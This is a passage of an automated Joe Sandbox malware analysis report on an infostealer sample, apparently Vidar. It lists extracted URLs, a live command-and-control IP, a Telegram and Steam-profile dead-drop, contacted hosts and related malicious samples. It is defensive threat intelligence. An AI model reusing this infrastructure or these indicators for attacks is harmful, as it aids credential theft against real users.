                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                		high
                                                                                                https://mozilla.org0/nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                  		high
                                                                                                  http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                    		high
                                                                                                    https://store.steampowered.com/points/shop/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/profiles/76561199673019888$aMRegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GDHIEHJE.5.drfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp, CAFHIJDH.5.drfalse
                                                                                                            		high
                                                                                                            https://37.27.87.155/%-RegAsm.exe, 00000005.00000002.2066860045.0000000001669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://steamcommunity.com/profiles/76561199673019888/badgesRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/GDHIEHJE.5.drfalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brJJJDGIECFCAKKFHIIIJEGDHIIE.5.drfalse
                                                                                                                    		high
                                                                                                                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199673019888[1].htm.5.drfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                        		high
                                                                                                                        https://37.27.87.155/etRegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                            		high
                                                                                                                            https://37.27.87.155AFBKFRegAsm.exe, 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                              		low
                                                                                                                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                		high
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/QFpRegAsm.exe, 00000005.00000002.2066860045.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCAFHIJDH.5.drfalse
                                                                                                                                        		high
                                                                                                                                        https://37.27.87.1550e3a617e50bnt-Disposition:RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          		low
                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                            		high
                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                              		high
                                                                                                                                              https://store.steampowered.com/about/76561199673019888[1].htm.5.drfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://t.me/irfailAtfile.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://37.27.87.155/:RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFJJJDGIECFCAKKFHIIIJEGDHIIE.5.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=GDHIEHJE.5.drfalse
                                                                                                                                                                		high
                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp, CAFHIJDH.5.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://37.27.87.155/%RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://steamcommunity.com/discussions/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/stats/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://37.27.87.155/ataRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://37.27.87.155/QRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://37.27.87.155AKEHIRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		low
                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCAFHIJDH.5.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGDHIEHJE.5.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://37.27.87.155/JRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&aRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://37.27.87.155/NRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://37.27.87.155/nesRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://steamcommunity.com/workshop/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://t.me/irfailfile.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://37.27.87.155/BRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://store.steampowered.com/legal/RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://www.sqlite.org/copyright.html.RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071759889.0000000019E7D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://37.27.87.155/CRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoGDHIEHJE.5.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://37.27.87.15576561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            https://store.steampowered.com/76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                37.27.87.155
                                                                                                                                                                                                                                		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                		39232UNINETAZfalse
                                                                                                                                                                                                                                184.30.122.179
                                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                                		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                Analysis ID:1428826
                                                                                                                                                                                                                                Start date and time:2024-04-19 17:07:06 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 6m 26s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@10/25@1/2
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 96
                                                                                                                                                                                                                                • Number of non-executed functions: 189
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                17:08:02API Interceptor1x Sleep call for process: RegAsm.exe modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                37.27.87.155SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    184.30.122.179GCJlGRkySF.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                      7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                        kSfQIMr2tu.exeGet hashmaliciousGlupteba, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                                                                          https://stk50.com/index-auth?openid.ns=mkbl5i04http://specs.openid.net/authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            https://twitch-gamer.com/9wBu-authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              https://skinboxs.com/simplenavi-authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                https://s-teamg-nsp.com/p/wvc-jtrd/vrawqtgf/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://steamconnunitiy.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    MEXTRAXT.exeGet hashmaliciousRisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                                      1WExtract.exeGet hashmaliciousRisePro Stealer, VidarBrowse

                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 104.67.208.180
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 104.67.208.180
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                                                        dUJqAYctYk.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.65.44.84
                                                                                                                                                                                                                                                        ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                        • 104.105.90.131

                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        AKAMAI-ASUSppop_verification_request.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.31.60.185
                                                                                                                                                                                                                                                        order.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.208.128.100
                                                                                                                                                                                                                                                        H6ccnU1094.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                        • 104.120.66.73
                                                                                                                                                                                                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                        • 184.31.61.57
                                                                                                                                                                                                                                                        tA6etkt3gb.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                                                                                                                                                                                        • 23.44.104.130
                                                                                                                                                                                                                                                        BzmhHwFpCV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 172.225.191.4
                                                                                                                                                                                                                                                        dPFRrhKTeG.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 88.221.207.232
                                                                                                                                                                                                                                                        0001.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                        • 23.44.104.130
                                                                                                                                                                                                                                                        PO_983888123.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.36.68.10
                                                                                                                                                                                                                                                        SA162.pdf.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.63.158.36
                                                                                                                                                                                                                                                        UNINETAZSecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 37.27.255.7
                                                                                                                                                                                                                                                        77system.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                        • 37.27.30.181
                                                                                                                                                                                                                                                        aPu2pUmHzL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 188.227.216.187
                                                                                                                                                                                                                                                        xjGg2eC75q.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        byGoj135nH.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        8uT94eNAur.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        rKYmlnOolQ.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220

                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
